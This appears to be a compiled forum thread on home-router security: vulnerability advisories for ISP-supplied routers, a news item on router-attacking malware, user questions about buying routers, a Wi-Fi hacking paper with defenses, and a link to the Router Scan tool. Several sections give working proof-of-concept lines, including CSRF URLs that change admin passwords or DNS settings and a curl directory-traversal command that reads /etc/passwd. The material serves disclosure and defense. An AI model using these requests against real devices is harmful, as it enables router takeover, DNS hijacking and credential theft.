Play (UPnP) protocol is enabled by default on the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. ============================================================================================ ============================================================================================ Manufacturer: Huawei Model: HG556a Tested firmwares: V100R001C10B077 Comments: Common router that ISP Vodafone used to give away to their customers -------------------------------------------------------------------------------------------- ---------------------------- USB Device Bypass Authentication ---------------------------- * Description: An external attacker, without requiring any login process, is able to view, modify, delete and upload new files to the USB storage device connected to the router. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121778 (http://osvdb.org/show/osvdb/121778) * PoC: If a USB storage device is hooked up to the router, an external attacker is able to download, modify the content and upload new files, without requiring any login process. In order to do so, the attacker only needs to access the router IP followed by the 9000 port. -------------------------------------------------------------------------------------------- --------------------------------- Bypass Authentication ---------------------------------- * Description: An external attacker, without requiring any login process, is able to reset the router settings to default ones besides bringing a permanent denial of service attack on. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121779 (http://osvdb.org/show/osvdb/121779) * PoC: Without requiring any login process, an attacker is able to bring on a permanent denial of service by constantly accessing the /rebootinfo.cgi URL. The attacker is also able to force the router to reset to default configuration settings by accessing the /restoreinfo.cgi URL. After that, the attacker is able to log into the router by using the default credentials. In both attacks, router asks for username-password and returns HTTP 401 status code (unauthorized), but after multiple requests are sent, it replies with HTTP 400 status code and executes the action. -------------------------------------------------------------------------------------------- ------------------------------- Cross Site Request Forgery ------------------------------- * Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router website allow an external attacker to carry out actions such as changing the administrator password. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121775 (http://osvdb.org/show/osvdb/121775) * PoC: Every input field is vulnerable to Cross Site Request Forgery attacks. I.e., if an attacker wants to change the administrator password, he may use the following URL to do so once the victim opens the link: http://192.168.1.23/es_ES/expert/userpasswd.cgi?usrPassword=vodafone1&sSuccessPage=administration.htm&sErrorPage=administration.htm -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121776 (http://osvdb.org/show/osvdb/121776) * PoC: Despite the fact that most of the input fields do not allow special characters to be written in, there are still some of them in which a XSS can be performed. I.e., the SSID field within the WiFi->Nombre (WiFi->Name) subdirectory allows script code injection. The script execution can be clearly seen within different subdirectories such as diagnostic.htm and config_wifi.htm. -------------------------------------------------------------------------------------------- -------------------------- Unauthenticated Cross Site Scripting -------------------------- * Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject malicious code within the router configuration website by sending a DHCP Request PDU. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121777 (http://osvdb.org/show/osvdb/121777) * PoC: An external attacker is able to inject malicious code within the router website without requiring any login process. This is achieved by sending a DHCP Request PDU containing the malicious script within the hostname parameter. The malicious code will be stored within the Dispositivos Conectados (Connected Devices) table. Once the victim views this list, the script is executed. -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122385 (http://osvdb.org/show/osvdb/122385) * PoC: The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. ============================================================================================ ============================================================================================ Manufacturer: Astoria Model: ARV7510 Tested firmwares: 00.03.41 Comments: Common router that ISP Vodafone used to give away to their customers -------------------------------------------------------------------------------------------- ---------------------------- USB Device Bypass Authentication ---------------------------- * Description: An external attacker, without requiring any login process, is able to view, modify, delete and upload new files to the USB storage device connected to the router. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121773 (http://osvdb.org/show/osvdb/121773) * PoC: If a USB storage device is hooked up to the router, an external attacker is able to download, modify the content and upload new files, without requiring any login process. In order to do so, the attacker only needs to access the router IP followed by the 9000 port. -------------------------------------------------------------------------------------------- ------------------------------- Cross Site Request Forgery ------------------------------- * Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router website allow an external attacker to carry out actions such as changing the administrator password. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121774 (http://osvdb.org/show/osvdb/121774) and OSVDB-121888 (http://osvdb.org/show/osvdb/121888) * PoC: Every input field is vulnerable to Cross Site Request Forgery attacks. I.e., if an attacker wants to change the administrator password, he may use the following URL to do so once the victim opens the link: http://192.168.1.22/cgi-bin/setup_pass.cgi?pwdOld=vodafone&pwdNew=vodafone1&pwdCfm=vodafone1 ============================================================================================ ============================================================================================ Manufacturer: Amper Model: ASL-26555 Tested firmwares: v2.0.0.37B_ES Comments: Common router that Spanish ISP Telefónica used to give away to their customers -------------------------------------------------------------------------------------------- ------------------------------- Cross Site Request Forgery ------------------------------- * Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router website allow an external attacker to carry out actions such as changing the administrator password. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121770 (http://osvdb.org/show/osvdb/121770) and OSVDB-121771 (http://osvdb.org/show/osvdb/121771) * PoC: Besides the main web configuration interface (port 80), there is a much more advanced one on port 8000 in which every input field is vulnerable to CSRF. I.e., if an attacker wants to change the DNS servers, he may use the following URL to do so once the victim opens the link: http://192.168.1.21:8000/ADVANCED/ad_dns.xgi?&set/dproxy/enable=0&set/dns/mode=4&set/dns/server/primarydns=80.58.61.251&set/dns/server/secondarydns=80.58.61.251&CMT=0&EXE=DNS It is also possible for an attacker to change the default router administrator password by sending the victim this URL: (URL is omitted due to size reasons) -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121772 (http://osvdb.org/show/osvdb/121772) * PoC: Despite the fact that most of the input fields do not allow special characters to be written in, there are still some of them in which a XSS can be performed. I.e., the SSID field within the Red Inalambrica->Nombre (Wireless Network->Name) subdirectory allows script code injection. The vulnerable input field is found into the basic web interface on port 80. The script execution can be clearly seen within the Advanced->WLAN Access Rules subdirectory, into the advanced web interface on port 8000. -------------------------------------------------------------------------------------------- -------------------------- Unauthenticated Cross Site Scripting -------------------------- * Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject malicious code within the router configuration website by sending a DHCP Request PDU. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121224 (http://osvdb.org/show/osvdb/121224) * PoC: An external attacker is able to inject malicious code within the router website without requiring any login process. This is achieved by sending a DHCP Request PDU containing the malicious script within the hostname parameter. The malicious code will be stored within the Connected Clients table (Setup->Local Network). Once the victim views this list, the script is executed. -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122388 (http://osvdb.org/show/osvdb/122388) * PoC: The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. ============================================================================================ ============================================================================================ Manufacturer: Comtrend Model: AR-5387un Tested firmwares: A731-410JAZ-C04_R02 Comments: Common router that ISP Jazztel used to give away to their customers -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121218 (http://osvdb.org/show/osvdb/121218) * PoC: Despite the fact that most of the input fields do not allow special characters to be written in, there are still some of them in which a XSS can be performed. I.e., the SSID field within the Wireless->Basic subdirectory allows script code injection. The script execution can be clearly seen within Wireless->Security and Wireless->MAC Filter subdirectories. -------------------------------------------------------------------------------------------- -------------------------- Unauthenticated Cross Site Scripting -------------------------- * Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject malicious code within the router configuration website by sending a DHCP Request PDU. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121215 (http://osvdb.org/show/osvdb/121215) * PoC: An external attacker is able to inject malicious code within the router website without requiring any login process. This is achieved by sending a DHCP Request PDU containing the malicious script within the hostname parameter. The malicious code will be stored within the DHCP Leases table (Device Info -> DHCP). Once the victim views this list, the script is executed. ============================================================================================ ============================================================================================ Manufacturer: Netgear Model: CG3100D Tested firmwares: v1.05.05 Comments: Common router that ISP ONO used to give away to their customers -------------------------------------------------------------------------------------------- ------------------------------- Cross Site Request Forgery ------------------------------- * Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router website allow an external attacker to carry out actions such as changing the administrator password. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121795 (http://osvdb.org/show/osvdb/121795) * PoC: Every input field is vulnerable to CSRF. An attacker may code a malicious website which triggers a POST request to the victim’s router. When a website with that code is accessed, the POST request is sent and the attack is done. It is also possible for an attacker to reset the victim’s router to default settings by using custom source code. (Source codes have been omitted due to size reasons). -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121780 (http://osvdb.org/show/osvdb/121780) * PoC: Despite the fact that most of the input fields do not allow special characters to be written in, there are still some of them in which a XSS can be performed. I.e., the SSID field within the Red Inalambrica->Nombre (Wireless Network->Name) subdirectory allows script code injection. The script execution can be clearly seen within different subdirectories such as Básico->Inicio (Basic->Home), Avanzado->Inicio (Advanced->Home) and Avanzado->Estado del router (Advanced->Router status). ============================================================================================ ============================================================================================ Manufacturer: Comtrend Model: VG-8050 Tested firmwares: SB01-S412TLF-C07_R03 Comments: Common router that Spanish ISP Telefonica used to give away to their customers -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121218 (http://osvdb.org/show/osvdb/121218) * PoC: Despite the fact that most of the input fields do not allow special characters to be written in, there are still some of them in which a XSS can be performed. I.e., the SSID field within the Wireless->Basic subdirectory allows script code injection. The script execution can be clearly seen within Wireless->Security and Wireless->MAC Filter subdirectories. -------------------------------------------------------------------------------------------- -------------------------- Unauthenticated Cross Site Scripting -------------------------- * Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject malicious code within the router configuration website by sending a DHCP Request PDU. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121215 (http://osvdb.org/show/osvdb/121215) * PoC: An external attacker is able to inject malicious code within the router website without requiring any login process. This is achieved by sending a DHCP Request PDU containing the malicious script within the hostname parameter. The malicious code will be stored within the DHCP Leases table (Device Info -> DHCP). Once the victim views this list, the script is executed. ============================================================================================ ============================================================================================ Manufacturer: Zyxel Model: P 660HW-B1A Tested firmwares: 3.10L.02 Comments: Common router that Spanish ISP Telefonica used to give away to their customers -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121796 (http://osvdb.org/show/osvdb/121796) * PoC: Despite the fact that most of the input fields do not allow special characters to be written in, there are still some of them in which a XSS can be performed. I.e., the Hostname field within the Dynamic DNS subdirectory allows script code injection. -------------------------------------------------------------------------------------------- ------------------------------- Cross Site Request Forgery ------------------------------- * Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router website allow an external attacker to carry out actions such as changing the administrator password. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121797 (http://osvdb.org/show/osvdb/121797) * PoC: Every input field is vulnerable to Cross Site Request Forgery attacks. I.e., if an attacker wants to change the administrator password, he may use the following URL to do so once the victim opens the link: http://192.168.1.1/password.cgi?sysPassword=newpassword ============================================================================================ ============================================================================================ Manufacturer: Comtrend Model: 536+ Tested firmwares: A101-220TLF-C35 Comments: Common router that Spanish ISP Telefonica used to give away to their customers -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122383 (http://osvdb.org/show/osvdb/122383) * PoC: The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. ============================================================================================ ============================================================================================ Manufacturer: D-Link Model: DIR-600 Tested firmwares: PV6K3A8024009 Comments: -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122384 (http://osvdb.org/show/osvdb/122384) * PoC: The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. ============================================================================================ We would also like to thank Alejandro Ramos (Project Tutor) and Maite Villalba (Director of Master). Greetings, Jose Antonio Rodriguez Garcia Alvaro Folgado Rueda Ivan Sanz de Castro. Source: http://dl.packetstormsecurity.net/1505-exploits/soho-22vulns.txt

https://ufile.io/c755f preview AV Test

Security researchers from Trend micro recently discovered a new JavaScript-based malware that infects your mobile devices and also attacks your home router by altering its DNS (Domain Name System) settings. This new threat was named as JS_JITON and was first noticed in end of December 2015, continuing to infect devices up until this day, hitting its peak in February 2016, with over 1,500 infections per day. Researchers say that the malware spreads it’s infection chain in a very simple way. Attackers place their code in some websites and wait for users to visit The malware’s infection chain is simple. According to Trend Micro researchers, attackers place malicious code on compromised websites and wait for users to visit these pages using mobile devices. Once this happens, the malware is downloaded to the user’s mobile device and executes, trying to connect to the local home network’s router IP using a series of admin and passwords combos hardcoded in the JS_JITON malware source code. The malware has over 1,400 credentials are included, and once the malware authenticates on the device, it will change the router’s DNS settings. Very little is known about what the intentions of this malware are, but taking into account that at one point it also included malicious code that executed from desktop computers, Trend Micro researchers believe this is a “work in progress,” with its creators still exploring their attack’s capabilities. The belief was made strong by the fact that attackers regularly update JS_JITON’s source code, changing small details here and there, fine tuning their attacks. Additionally, at one point, the JS_JITON source code also included a keylogging component. According to researchers JS_JITON could attack D-Link and TP-Link routers, but it also included a special exploit to take advantage of CVE-2014-2321, an older vulnerability in ZTE modems. Malwares like this could be a serious threat if not killed in the initial stage. Source

Salut.De cateva zile m-am uitat pe site-ul emag(tot primesc spam cu mega oferte etc.) si mi-am adus aminte ca nu mi-ar strica un router nou.Pe acesta il am acum Router wireless D-Link DIR-600 - eMAG.ro M-am uitat la aceste 2 modele, fiind cele mai cumparate Router Wireless-N Tenda F300, 300Mbps - eMAG.ro Router Wireless-N 300Mbps Asus RT-N12-D1 - eMAG.ro Care e diferenta dintre ele?Inafara de pret.Am vazut niste prostii pe acolo, gen ca pot creea mai multe retele pt diferiti useri, dar nu prea am nevoie de asa ceva, ca pe el stau eu si familia... Pe care mi-l recomandati?Sau...mai bine spus, se merita sa cumpar unul din ele, sau sa mai strang bani si sa iau unul mai bun?Precizez ca nu o duc f bine cu viteza de net, si uneori am si cate 6-7 kkturi conectate la router.

Salut, cine ma poate ajuta cu un tutorial ca sa pot instala OpenWRT pe Router Pirelli Alice Gate VoIP 2 Plus Wi-Fi. Doresc sa transform un port LAN in WAN si sa il folosesc pe RDS. Am gasit pe un site in italiana dar nu prea inteleg... Multumesc anticipat.

While the access points in organizations are usually under the protection of organization-wide security policies, home routers are less likely to be appropriately configured by their owners in absence of such central control. This provides a window of opportunity to neighboring Wi-Fi hackers. We talk about hacking a neighbor’s Wi-Fi since proximity to the access point is a must for wireless hacking—which is not an issue for a neighbor with an external antenna. With abundance of automated Wi-Fi hacking tools such as ‘Wifite’, it no longer takes a skilled attacker to breach Wi-Fi security. Chances are high that one of your tech-savvy neighbors would eventually exploit a poorly configured access point. The purpose may or may not be malicious; sometimes it may simply be out of curiosity. However, it is best to be aware of and secure your Wi-Fi against attacks from such parties. Tools Used: Aircrack-ng Suite Wireshark Reaver Bully WiFiPhisher Nessus Vulnerability Scanner Attacks Against Access Point Password The choices of attack for a neighboring Wi-Fi hacker vary with different configurations of Wi-Fi access points. Specific Wi-Fi security standards are associated with particular security weaknesses that the attacker would target. Open Hotspots Although rare, open Wi-Fi access points are still extant in certain homes. When open access points are deployed in homes, it could be out of ‘generosity’ towards neighbors or sheer insouciance towards security, or both. It is observed that home users with unlimited bandwidth and data are more likely to leave their access point unsecured, unaware of the security implications. Attack: Open Wi-Fi networks do not encrypt data packets over wireless channels. This means that anyone with a packet capture utility can read unencrypted HTTP, email, and FTP traffic. In this case, we captured the traffic pertaining to an open Wi-Fi on channel 1 using ‘Airodump-ng’, and analyzed the captured file in Wireshark, which revealed that a user on the network was logging into his (demo) bank account [Figure 1]. Figure 1 While it is highly unlikely today that a banking website would lack an HTTPS link, this is meant to demonstrate the dangers of using unencrypted Wi-Fi along with unencrypted protocols such as HTTP, FTP, SMTP, etc. Defense: Never leave the access point ‘open’ or unsecured. Access the control panel of the wireless router and configure it to use a complex WPA2 key (explained later in this paper). If you insist on using an open access point, consider using ‘HTTPS Everywhere‘ while browsing. WEP IV Collisions WEP is an outdated security standard vulnerable to statistical attacks due to IV collisions. It offers a false sense of security, and in the wake of WPA2, it is hard to think of a reason why one would want to use it. Attack: Since WEP cracking has been covered on myriad blogs and websites already, we will refrain from going into details of attacks against it. For the intricacies of how such attacks are performed, you may visit this page. Defense: Since the use of WEP is now deprecated due to serious security flaws, you should use WPA2 (AES) instead. WPS Based Attacks WPS PIN is an 8 digit number pertaining to the wireless router. It was meant to liberate users from having to remember complex WPA passwords. The idea was that since WPA is susceptible to dictionary attacks, the user would set a complex WPA passphrase and deploy WPS in order to avoid having to remember the passphrase. After supplying the correct WPS PIN to the router, it would hand over the configuration details to the client—which includes the WPA password. Brute forcing the WPS PIN WPS was implemented incorrectly: Firstly, the last digit of the PIN was a checksum which means the effective size of a WPS PIN is only 7 digits. Moreover, the registrar (router) checks the PIN in 2 parts. This means the first part of 4 digits would have 10,000 possible combinations, and the second part of 3 digits would have 1,000 possible combinations. Hence, the attacker would require only 11,000 attempts, in the worst case, to brute force the PIN—which is very feasible. Here, during an experiment, we were able to crack the WPS PIN in under 6 hours using the popular tool ‘reaver’ [Figure 2]. Figure 2 Defense: Make sure you have the latest firmware installed and that your router has a WPS lockout policy (AP rate limiting) after a certain number of unsuccessful attempts. In absence of such lockout policy, turn off WPS in your router. Known WPS PIN The WPS PIN attack becomes incredibly effective and short if the attacker somehow has knowledge of a neighbor’s WPS PIN. Attack: How does the hacker (in this case a neighbor) know the WPS PIN? The PIN is usually written on the bottom of the wireless router. The (evil) neighbor could quickly glance at it during a social visit. Additionally, access points may be left ‘open’ for a certain duration while the user is implementing some router configuration changes or performing a factory reset. This offers a window of opportunity to the attacker to quickly connect to the router, access the control panel (using default credentials), and take note of the WPS PIN [Figure 3]. Figure 3 Once the hacker gains knowledge of the PIN, it could be used to uncover a complex WPA passphrase in seconds. Defense: Scrub off the WPS PIN on the bottom of the wireless router, and avoid leaving your access point ‘open’ at any time. Furthermore, most updated routers will allow the owner to change the WPS PIN from the control panel [Figure 4]. Generate a new WPS PIN periodically. Figure 4 Dictionary Attacks on WPA Handshakes As long as strong, complex WPA passphrases are used to protect the access points, dictionary attacks on WPA handshakes are not really a concern. However, every once in a while a user will configure a dictionary word as the WPA password for the sake of simplicity. This leads to successful recovery of passwords from the WPA 4-way handshakes using dictionary attacks. Attack: The attacker seeks to capture the WPA 4-way handshake between a legitimate client and the access point. A dictionary attack is used to recover the plaintext passphrase from this WPA handshake. For the intricacies of this attack, you can visit this page. Defense: Configure complex passphrases that are a combination of special characters, numbers, letters, etc. Never use personal information such as your phone number as the WPA passphrase, as it might be guessed. Wi-Fi Phishing When all else fails, social engineering could always be relied upon to exploit what is often the weakest link in the chain of security—the human element. Phishing is a type of social engineering attack where the user of the Wi-Fi access point could be tricked into revealing the password. Attack: Traditionally, such phishing attacks are carried out over emails; however, in this case even a naïve user would get suspicious if the attacker asks for a WPA password over email. Hence, the best approach is to launch an evil twin attack, make the user join the fake access point, and ask for the password. WiFiPhisher, a python tool, implements this approach. First, the tool prepares the attacker’s machine for the attack. This involves setting up the HTTP and HTTPS servers, detecting the wireless interfaces (wlan0 and wlan1), putting one of these interfaces in monitor mode, and managing DHCP services for IP address allotment [Figure 5]. Figure 5 The tool then detects the Wi-Fi access points in the vicinity and lists them for the attacker [Figure 6]. The attacker then specifies the access point to attack. Figure 6 After the attacker chooses the access point, the tool clones the ESSID and attempts to jam the authentic access point. This is important since the attacker wants the users to get de-authenticated from the legitimate network and connect to the evil twin. If the users are not knocked off their authentic access point, or if the attacker’s evil twin access point is too far away for the users to get a strong signal from it, then the attack does not work, since no users will connect to the evil twin. This evil twin access point is now waiting for clients to connect. When a client connects, the attacker is notified that an IP address is allocated to a client. In this case, we notice that an Android device has connected to the evil twin [Figure 7]. Figure 7 Now, it is just a matter of time before this client attempts to access a webpage online. When the client requests a webpage, our HTTP or HTTPS server would serve the phishing page instead. For instance, here the client, the Android device, requested to connect to Google and was served the phishing page instead [Figure 8]. Figure 8 The attacker is notified of the client’s request for the web page and knows now that the client has been served the phishing page [Figure 9]. Figure 9 Moment of truth: either the user gets suspicious and closes the connection, or falls for the con and provides the WPA password as requested [Figure 8]. The user is redirected to an “upgrade-in-progress” page after he submits the WPA password [Figure 10]. Figure 10 Meanwhile, the password is revealed to the attacker over the console [Figure 11]. Figure 11\ The user may end up revealing the password due to the following reasons: The user surmises that he is connected to his own legitimate access point. The phishing page is intentionally cloaked to appear as an authentic router page. User has a curiosity towards the open access point with the same ESSID. Defense: Always be wary of any page asking for a password. Avoid giving out the WPA password over shady pages. Aftermath: The Hacker is in Once the attacker has obtained the password and is connected to the access point, he would attempt to explore further. The first point of interest is the router’s control panel. Default credentials: A surprising number of home users do not change the default credentials to their router’s management panel. Router default credentials can be obtained on the Internet, and subsequent access to this management console grants the hacker further privileges on the network. Digging PIN and passwords: Once inside the Wi-Fi management panel, the hacker would note down the WPS PIN and any hidden password for future use. “Hidden” passwords behind asterisks are easy to uncover. For instance, we uncover the ‘admin’ and ‘user’ passwords germane to a router using ‘Inspect element’ in Chrome [Figure 12]. Figure 12 Exploiting clients: Since the attacker is now a part of the local network, he can initiate local scans to glean details of clients, services, ports etc. This allows the attacker to target vulnerabilities pertaining to clients connected to the network [Figure 13]. Figure 13 DNS Manipulation: If the attacker has secured access to the router’s control panel, he can modify the DNS configuration which has severe implications on security. For example, the attacker could plant a fake DNS entry to redirect clients using an online banking service to a rogue server serving phishing pages. Maintaining Access: A persistent neighboring hacker requiring prolonged access to the Wi-Fi access point would want to ensure continued access even after the current password or security protocol is modified later by the owner. Accordingly, the hacker would access the router control panel and take note of the WPS PIN [Figure 4]. More advanced attackers would try to plant a backdoor in the router firmware, such as a master password, that would allow them to access the Wi-Fi at will in the future. However, this involves flashing custom firmware, such as DD-WRT, to the router. DD-WRT provides open source router firmware for numerous wireless router models. The attacker would download the appropriate DD-WRT firmware, modify the source code to include a master password or backdoor, and flash this firmware to the router using the router control panel DDW1 [Figure 14]. Figure 14 Conclusion The purpose of this paper is not to condone hacking your neighbors’ Wi-Fi, rather to apprise owners of common security weaknesses in Wi-Fi configurations and suggest relevant mitigation. “Since I have unlimited data and bandwidth, I do not mind if an unknown person is using my Wi-Fi.” While this generosity is worthy of some appreciation, bandwidth and data usage are not the only concerns when your Wi-Fi is accessed by an unauthorized party. Consider the case where a neighbor attempted to indict the owners after cracking their WEP key and accessing child pornography websites. Since it is your network, the ISP and authorities turn to you while investigating illicit activities. Router manufacturers provide GUI control panels that make it easy for owners to configure their access points. It is best to utilize these interfaces for secure configuration of access points that are capable of thwarting attacks from neighbors. References [1] DD-WRT. DD-WRT. [Online]. Development - DD-WRT Wiki [2] Nikita Borisov, Ian Goldberg, and David Wagner. isaac.cs.berkeley.edu. [Online]. (In)Security of the WEP algorithm [3] Sean Gallagher. (2014, January) ArsTechnica. [Online]. Backdoor in wireless DSL routers lets attacker reset router, get admin | Ars Technica Source

Router Scan is able to find and identify a variety of devices from a variety of known routers / routers, and most importantly - to pull out of them useful information, in particular the characteristics of the wireless network: a way to protect the access point (encryption), access point name (SSID) and key access point (passphrase). Also receives information about the WAN connection (useful when scanning the local network) and outputs the make and model of the router. Getting information occurs in two possible ways: the program will try to pick up a couple of login / password to the router from the list of standard passwords, resulting gain access. Or will be used non-destructive vulnerability (or bugs) for the router model, allowing to obtain the necessary information and / or to bypass the authorization process. TinyUpload.com - best file hosting solution, with no limits, totaly free pass: Stas'M Corp. Virus total https://www.virustotal.com/en/file/a5f42a031933c0db2198aa24adb0799290aa0bbba9a9fe556fe7efb60d616602/analysis/

# Title : Sagem F@st 3304-V2 Directory Traversal Vulnerability # Vendor : http://www.sagemcom.com # Severity : High # Tested Router : Sagem F@st 3304-V2 (3304, other versions may also be affected) # Date : 2015-03-01 # Author : Loudiyi Mohamed # Contact : Loudiyi.2010@gmail.com # Blog : https://www.linkedin.com/pub/mohamed-loudiyi/86/81b/603 # Vulnerability description: Sagem Fast is an ADSL Router using a web management interface in order to change configuration settings. The router is Sagem Fast is an ADSL Router using a web management interface in order to change configuration settings. The web server of the router is vulnerable to directory traversal which allows reading files by sending encoded '../' requests. The vulnerability may be tested with the following command-line: curl -v4 http://192.168.1.1//../../../../../../../../../../etc/passwd Or directly from navigateur: http://192.168.1.1/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd http://192.168.1.1/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc%2fnet%2farp Source

Feature "It is far more common to find routers with critical flaws than without" - Craig Young "It's sad that end-user education about strong passwords, password safes, and phishing can be undone by something as innocuous as the blinking box in the corner of your room. - Peter Adkins Introduction Home and small business router security is terrible. Exploits emerge with depressing regularity, exposing millions of users to criminal activities. Many of the holes are so simple as to be embarrassing. Hard-coded credentials are so common in small home and office routers, comparatively to other tech kit, that only those with tin-foil hats bother to suggest the flaws are deliberate. Hacker gang Lizard Squad crystallised the dangers – and opportunities – presented by router vulnerabilities when over the Christmas break they crafted a slick paid denial of service stresser service that operated on hacked boxes. Customers were found paying to flood targets of choice with gigabits of bandwidth stolen from what the black hats claimed were a fleet of half a million vulnerable and subsequently hacked routers. A year earlier, security boffins at Team Cymru warned that an unknown ganghad popped 300,000 routers in a week, altering the DNS settings to point to malicious web entities. Those routers were hacked through a self-propagating worm (PDF) that researchers had already warned about, but not yet seen. It used a mix of brute force password guessing of web admin consoles, cross-site request forgery, and known un-patched vulnerabilities. Arguably the most infamous hack in recent months was Check Point's so-called Misfortune Cookie discovered in December 2014. This vulnerability was thought to impact a staggering 12 million routers across 200 models from big names such as Linksys, D-Link, TP-Link, ZTE, and Huawei. Affected routers could be hijacked with a crafted cookie that allows attackers to meddle with just about everything on the units, from password theft, to alterations to DNS, and infection of connected devices. In October Rapid7 had chipped in with its own research, warning that Network Address Translation Port Mapping Protocol configurations in 1.2 million routers was sufficiently borked that remote attackers could spy on internal traffic. Security is 'abysmal' "Router security remains abysmal, especially among the cheapest brands,” says John Matherly, founder of the popular Shodan search engine which crawls for internet-connected devices. “Backdoors, no automated patching and default usernames and passwords are just a few of the problems that many SOHO routers continue to face.” Matherly last month dug up an estimated 250,000 routers used in Spain that were using the same SSH keys, placing those configured a for remote access at heighten risk. He also points to research published two days later by Entrust Solutions hacker Nabin Kc, who found 200,000 home routers contained a firmware backdoor, a flaw replicated across 10 different vendors who seemed to be re-branding a vanilla router. Matherly says badge-engineering seems a common practise for vendors that compete on price over form or function. “It seems that the rate of security problems discovered with routers is only limited by the number of security experts that take the time to analyse the devices,” he says. Source

